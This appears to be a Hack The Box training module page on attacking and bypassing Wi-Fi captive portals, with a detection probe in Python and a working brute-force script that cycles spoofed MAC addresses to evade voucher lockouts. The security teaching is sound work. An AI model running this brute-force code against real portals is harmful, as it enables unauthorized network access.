
Bypassing Wi-Fi Captive Portals

In this module, we delve into a range of methods for identifying and bypassing captive portals, employing both indirect and direct exploitation techniques. We cover tactics such as MAC spoofing, ARP poisoning, DNS tunneling, and credential interception, alongside direct attack vectors like Cross-Site Scripting (XSS), file upload vulnerabilities, file inclusion, and brute force attacks. Additionally, we will examine client hijacking strategies to extract credentials and circumvent portal restrictions. By understanding these attack methods, we can evaluate and enhance the security of captive portal implementations.

4.50

Created by Sentinal
Co-Authors: MrGrep, N1tr0x

Medium Offensive

Summary

In this module, we explore methods for enumerating and attacking Wi-Fi captive portals with the goal of bypassing them. Captive portals are commonly used to restrict network access until authentication is completed, but they often contain vulnerabilities that can be exploited. We will demonstrate a range of techniques, including captive portal detection, indirect and direct exploitation methods, and client-side hijacking strategies. These can be used to compromise devices on the network, extract stored credentials, and ultimately bypass the portal's access restrictions. By understanding and applying these attack vectors, we gain deeper insight into the inherent security flaws in captive portals and how attackers can exploit them.

In this module, we will cover:

  • Introduction
    • Captive Portal Usage
    • Reconnaissance
  • Indirect Exploitation of the captive portal, such as:
    • MAC Address Spoofing
    • VPN Bypasses
    • ARP Spoofing and Hijacking
    • External HTTP Credential Interception
    • External HTTP Session Interception
    • Hostile Portal Attacks
  • Hijacking Clients through:
    • Vulnerable Services
    • Interception
    • Malware Portals
  • Direct Exploitation of the captive portal, such as:
    • Brute Forcing
    • XSS and Command Injection
    • Host Header Manipulation
    • File Upload Attacks
    • File Inclusion and Privilege Escalation
  • Skills Assessment

This module is broken down into sections with accompanying hands-on exercises to practice each of the tools, tactics, and techniques we cover. There are no specific Wi-Fi hardware requirements for this module, as Hack The Box manages all necessary resources. You will need to RDP into the provided attacker VM to perform the exercises.

As you work through the module, you will see example commands and command outputs for the various tools and topics introduced. Reproducing as many examples as possible is recommended to reinforce the concepts presented in each section.

You can start and stop the module at any time and pick up where you left off. There is no time limit or grading, but you must complete all of the exercises and the skills assessments to receive the maximum number of cubes and have this module marked as complete in any paths you have chosen.

This module is classified as "Medium" and assumes a working knowledge of Linux systems, common web vulnerabilities, Wi-Fi fundamentals and network fundamentals. A firm grasp of the following modules can be considered a prerequisite for the successful completion of this module:

Introduction


Captive portals are authentication gateways that control access to a network, commonly used in public Wi-Fi hotspots, corporate environments, and paid Wi-Fi services. These portals ensure that users comply with specific terms before gaining internet access. When a user connects, their browser is redirected to the captive portal, which may require authentication, agreement to terms, or even payment before granting internet access.


Common Use Cases of Captive Portals:

Captive portals serve as a controlled gateway for users accessing a network. They are widely used in different environments to regulate internet access, enforce policies, and enhance security. Below are some of the most common use cases:

  • Public Wi-Fi (Hotels, Airports, Cafes, Shopping Malls) – To control and monitor access.
  • Corporate Networks and Enterprises – To enforce access policies.
  • Paid Wi-Fi Services – To collect payments before granting internet access.

How Captive Portals Work

The process typically follows these steps:

1. Connection

When a user connects to a Wi-Fi network, whether open or encrypted, their device requests an IP address from the network's DHCP server. This gives the device connectivity to the local network, but the gateway still blocks or redirects its traffic towards the internet until the client has been authorized.

2. Redirection to Captive Portal

Once connected, if the user tries to access any website over plain HTTP, the network gateway intercepts the request and, instead of forwarding it, answers with an HTTP redirect (typically a 302) to the captive portal page. Some gateways instead hijack DNS for unauthenticated clients, resolving every name to the portal's own address. HTTPS requests cannot be redirected this way without a certificate warning, which is why operating systems and browsers send a plain-HTTP probe to a known URL as soon as they connect and open the portal page themselves when the expected response does not come back.

The portal page typically contains a login form, terms of use, or a payment option, depending on the network's requirements.

3. Authentication and User Agreement

At this stage, the user must complete one of the following actions to gain network access:

  • Login with credentials – In enterprise or university networks, users may need to enter a username and password.
  • Accept terms and conditions – In public Wi-Fi setups, simply agreeing to terms may be sufficient.
  • Enter a voucher or access code – Some networks issue temporary access codes to limit usage.
  • Payment for access – Paid Wi-Fi services require users to enter payment details before proceeding.

4. Network Access Granted

Once the user has successfully authenticated, the captive portal grants them internet access. This is usually done by updating the gateway's firewall rules or adding the client's MAC address (sometimes its IP address) to an allowlist. Because the allowlist identifies the client by these link-layer and network-layer attributes rather than by anything cryptographic, cloning them is what makes several of the bypasses covered later possible.

Some networks impose additional restrictions, such as:

  • Session time limits – Users may need to reauthenticate after a set duration.
  • Bandwidth limitations – Speeds may be throttled to prevent excessive usage.
  • Concurrent connection limits – Some networks restrict the number of devices per user.
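The client side of steps 2 and 4 can be checked with the same probe that operating systems use: request a known URL that should return an empty HTTP 204 and see what actually comes back. The following Python is an added example, not code from the module; the sample responses are constructed for the example, and only the live probe() needs network access.

```python
"""Captive-portal detection probe, as OSes and browsers do it.

Added example, not the module's own code. Android and Chrome request
http://connectivitycheck.gstatic.com/generate_204 and expect an empty
HTTP 204. A gateway that has not yet authorized the client answers
instead with a redirect to its portal (HTTP interception) or serves its
own page under the probe's hostname (DNS hijacking). The sample
responses below are constructed, not captured from a real network.
"""
import ipaddress
import re
import urllib.error
import urllib.request
from dataclasses import dataclass, field
from typing import Optional

PROBE_URL = "http://connectivitycheck.gstatic.com/generate_204"
REDIRECT_CODES = {301, 302, 303, 307, 308}
META_REFRESH = re.compile(r'http-equiv=["\']?refresh["\']?[^>]*url=([^"\'>\s]+)', re.I)


@dataclass
class ProbeResponse:
    status: int
    headers: dict = field(default_factory=dict)  # header names lower-cased
    body: bytes = b""


def classify(resp: ProbeResponse) -> tuple[str, Optional[str]]:
    """Return (verdict, portal_url) for one probe response.

    'open'   : the expected empty 204 came back, no portal in the path
    'portal' : something intercepted the probe; the second element is the
               portal URL when it could be recovered
    'blocked': the probe was answered, but not in a way we recognise
    """
    if resp.status == 204 and not resp.body:
        return "open", None
    if resp.status in REDIRECT_CODES or resp.status == 511:
        # 3xx to the portal, or RFC 6585 "511 Network Authentication Required"
        return "portal", resp.headers.get("location")
    if resp.status == 200:
        # The gateway served its own page in place of the empty 204 (DNS hijack
        # or transparent proxy); try to pull the portal URL out of a meta refresh.
        m = META_REFRESH.search(resp.body.decode("utf-8", "replace"))
        return "portal", m.group(1) if m else None
    return "blocked", None


def dns_looks_hijacked(resolved_ip: str) -> bool:
    """A public probe hostname resolving to a private, link-local or loopback
    address means the gateway's resolver is answering for it."""
    ip = ipaddress.ip_address(resolved_ip)
    return ip.is_private or ip.is_link_local or ip.is_loopback


def probe(url: str = PROBE_URL, timeout: float = 5.0) -> ProbeResponse:
    """Fetch the probe URL without following redirects, so a 302 stays visible."""

    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, req, fp, code, msg, headers, newurl):
            return None  # urllib then raises HTTPError for 3xx instead of following

    opener = urllib.request.build_opener(NoRedirect)
    try:
        with opener.open(url, timeout=timeout) as r:
            return ProbeResponse(r.status, {k.lower(): v for k, v in r.headers.items()}, r.read())
    except urllib.error.HTTPError as e:
        return ProbeResponse(e.code, {k.lower(): v for k, v in e.headers.items()}, e.read())


# Constructed sample responses (10.0.0.1 is an assumed gateway address).
SAMPLES = {
    "open_internet": ProbeResponse(204),
    "http_redirect": ProbeResponse(302, {"location": "http://10.0.0.1/login?dst=" + PROBE_URL}),
    "dns_hijack_page": ProbeResponse(200, {"content-type": "text/html"},
        b'<html><head><meta http-equiv="refresh" content="0; url=http://10.0.0.1/portal">'
        b'</head></html>'),
    "rfc6585": ProbeResponse(511, {"location": "http://10.0.0.1/auth"}),
    "proxy_error": ProbeResponse(503),
}


def demo() -> dict:
    """Classify every constructed sample; returns {name: (verdict, portal_url)}."""
    return {name: classify(r) for name, r in SAMPLES.items()}


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name:16} -> {verdict}")
    # Live check on the current network: print(classify(probe()))
```

Run it on the attacker VM before and after authenticating to the lab portal: the redirect target is the portal URL to enumerate, and a 204 confirms the bypass worked. The DNS check is deliberately separate, since a gateway that only hijacks DNS will hand back the probe host as a private address while the HTTP response still looks like a normal 200.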

Attacking Captive Portals:

While captive portals serve as an access control mechanism for networks, they also introduce several security risks. Attackers can exploit these portals to intercept traffic, steal credentials, or bypass restrictions. Below are some key security concerns:

1. Man-in-the-Middle (MitM) Attacks:

Since users must first connect to an untrusted network before authentication, attackers can position themselves between the user and the legitimate portal to intercept traffic. Common MitM techniques include:

  • ARP Spoofing – By poisoning the ARP cache, an attacker can intercept and modify network traffic.
  • SSL Stripping/Interception – If the portal's login page is served over HTTPS, an attacker in the path can still try to downgrade the connection (SSL stripping) when the client's first request is plain HTTP and the portal host does not enforce HSTS, or present their own certificate and rely on the user clicking through the browser warning. Either way, the submitted credentials are then readable in plaintext.

2. Credential Harvesting via Fake Captive Portals:

Attackers can create rogue captive portals that mimic legitimate login pages to steal user credentials. This is especially dangerous in environments where users use the same credentials for enterprise Wi-Fi authentication.

  • Rogue Access Points – Attackers set up a fake Wi-Fi network with the same SSID as the target network and host a fake captive portal to lure users into connecting. Once a user enters their credentials, the attacker captures them and can use them for unauthorized access to corporate or enterprise networks. Attackers can also use JavaScript keyloggers embedded in fake captive portals to log keystrokes in real-time.

3. Bypass Methods and Evasion Techniques:

Some users attempt to bypass captive portals using various techniques, including:

  • DNS Tunneling – Encapsulating internet traffic within DNS queries to evade access restrictions; this works when the gateway forwards DNS queries from unauthenticated clients to an upstream resolver.
  • MAC Address Spoofing – Cloning the MAC address of an already authenticated device to trick the network into granting access.
  • Session Hijacking – Capturing and reusing authentication cookies or session tokens to bypass login pages.

4. Direct Attacks on Captive Portals

Since captive portals often include login pages and web-based authentication mechanisms, they can be vulnerable to traditional web security threats:

  • Cross-Site Scripting (XSS) – If the portal does not properly sanitize user input, an attacker can inject malicious JavaScript into the page, which can lead to session hijacking, credential theft, or browser-based exploits.
  • File Upload Vulnerabilities – Some captive portals allow users to upload identification documents or proof of payment. If file type validation or upload directory permissions are not properly enforced, attackers may upload malicious scripts or web shells.
  • Brute Force – If the captive portal relies on weak authentication (e.g., simple passwords or 4-digit PINs), attackers can automate login attempts to guess credentials. A 4-digit code has only 10,000 possibilities, so without rate limiting or account lockout the whole space can be tried in minutes.
  • File Inclusion – If the captive portal has a file inclusion vulnerability, attackers can read sensitive files from the server and, depending on the flaw, execute code on it.
  • Host Header Manipulation – Many captive portals rely on the Host header to determine how requests are processed. By modifying this header, we may be able to bypass authentication or gain access to restricted pages. Some portals use weak validation, allowing us to trick the server into thinking we are already authenticated.
  • Command Injection – If the captive portal executes system commands based on user input (such as verifying MAC addresses or processing login credentials), we can attempt command injection. Exploiting vulnerable parameters may allow us to execute arbitrary system commands, escalate privileges, or completely bypass authentication.
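The brute-force point above, and why a per-client lockout alone does not fix it, is easiest to see in code. The following Python is an added example, not code from the module: two portal back-ends are simulated in memory (constructed for this example), one with no lockout and one that locks a client out after five failures keyed on its MAC address, as a real portal would key it. http_submit_factory builds the same attack against a live portal; its URL, form field name and success marker are assumptions.

```python
"""Brute-forcing a short voucher code, and the lockout that should stop it.

Added example, not code from the module. NaivePortal and LockoutPortal are
constructed in-memory stand-ins for a portal back-end; VOUCHER is a
constructed secret. Only http_submit_factory talks to a real portal, and
its URL, field name and success marker are assumptions.
"""
import itertools
import time
import urllib.parse
import urllib.request
from typing import Callable, Optional

Submit = Callable[[str], bool]  # returns True when the portal accepts the code


def pin_space(digits: int = 4):
    """Every zero-padded numeric code of the given length, in order."""
    for n in range(10 ** digits):
        yield f"{n:0{digits}d}"


def brute_force(submit: Submit, digits: int = 4) -> tuple[Optional[str], int]:
    """Submit every code until one is accepted. Returns (code or None, attempts)."""
    attempts = 0
    for code in pin_space(digits):
        attempts += 1
        if submit(code):
            return code, attempts
    return None, attempts


class NaivePortal:
    """No rate limit, no lockout: exhaustive search always succeeds."""

    def __init__(self, voucher: str):
        self.voucher = voucher

    def submit(self, code: str) -> bool:
        return code == self.voucher


class LockoutPortal:
    """Rejects a client for LOCK_SECONDS after MAX_ATTEMPTS failed guesses."""

    MAX_ATTEMPTS = 5
    LOCK_SECONDS = 300

    def __init__(self, voucher: str, clock=time.monotonic):
        self.voucher = voucher
        self.clock = clock
        self.failures: dict[str, int] = {}
        self.locked_until: dict[str, float] = {}

    def submit(self, client_mac: str, code: str) -> bool:
        now = self.clock()
        if self.locked_until.get(client_mac, 0.0) > now:
            return False  # locked: rejected without even checking the code
        if code == self.voucher:
            self.failures.pop(client_mac, None)
            return True
        self.failures[client_mac] = self.failures.get(client_mac, 0) + 1
        if self.failures[client_mac] >= self.MAX_ATTEMPTS:
            self.locked_until[client_mac] = now + self.LOCK_SECONDS
            self.failures[client_mac] = 0
        return False


def rotating_mac_submit(portal: LockoutPortal, per_mac: int = 4) -> Submit:
    """Attacker side: present a fresh (spoofed) MAC every `per_mac` guesses,
    staying under the lockout threshold so no single client is ever locked."""
    counter = itertools.count()

    def submit(code: str) -> bool:
        n = next(counter) // per_mac
        return portal.submit(f"02:00:00:00:{(n >> 8) & 0xff:02x}:{n & 0xff:02x}", code)

    return submit


def http_submit_factory(login_url: str, field: str = "voucher",
                        success_marker: bytes = b"Logged in") -> Submit:
    """Same attack over HTTP against a real portal (URL, field, marker assumed)."""

    def submit(code: str) -> bool:
        data = urllib.parse.urlencode({field: code}).encode()
        req = urllib.request.Request(login_url, data=data, method="POST")
        with urllib.request.urlopen(req, timeout=5) as r:
            return success_marker in r.read()

    return submit


VOUCHER = "4271"  # constructed secret for the simulated portals


def attack_naive() -> tuple[Optional[str], int]:
    return brute_force(NaivePortal(VOUCHER).submit)


def attack_lockout_single_client() -> tuple[Optional[str], int]:
    portal = LockoutPortal(VOUCHER)
    return brute_force(lambda code: portal.submit("aa:bb:cc:dd:ee:01", code))


def attack_lockout_rotating_mac() -> tuple[Optional[str], int]:
    return brute_force(rotating_mac_submit(LockoutPortal(VOUCHER)))


if __name__ == "__main__":
    print("no lockout           :", attack_naive())
    print("lockout, one MAC     :", attack_lockout_single_client())
    print("lockout, rotating MAC:", attack_lockout_rotating_mac())
```

The naive portal gives up the code after 4,272 guesses; the lockout portal rejects everything from a single MAC after the fifth failure, but an attacker who spoofs a new MAC every four guesses recovers the code in exactly the same 4,272 attempts. A lockout keyed on the client identifier that the client controls is not a brute-force defence; throttle per voucher and globally as well, and use codes long enough that the space cannot be enumerated.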

Captive portals are essential for securing network access, ensuring compliance, and controlling bandwidth usage. However, because they sit on an untrusted network, identify clients by spoofable attributes, and expose a web application to everyone who connects, they also present attack surface and bypass opportunities, which we explore in the later sections.
